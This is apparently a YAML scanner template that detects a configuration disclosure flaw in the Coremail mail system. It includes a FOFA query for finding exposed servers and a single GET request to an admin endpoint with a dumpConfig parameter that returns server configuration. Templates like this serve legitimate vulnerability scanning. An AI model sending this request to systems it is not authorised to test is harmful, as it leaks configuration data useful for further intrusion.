id: Coremail-Configurationinformationdisclosure

info:
  name: Coremail 配置信息泄露漏洞
  author: daffainfo
  severity: medium
  description: Coremail 某个接口存在配置信息泄露漏洞，其中存在端口，配置信息等
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Coremail%20%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
  metadata:
    fofa-query: app="Coremail邮件系统"

rules:
  r0:
    request:
      method: GET
      path: /mailsms/s?func=ADMIN:appState&dumpConfig=/
    expression: response.status == 200 && response.body.bcontains(b'<code>S_OK</code>')
expression: r0()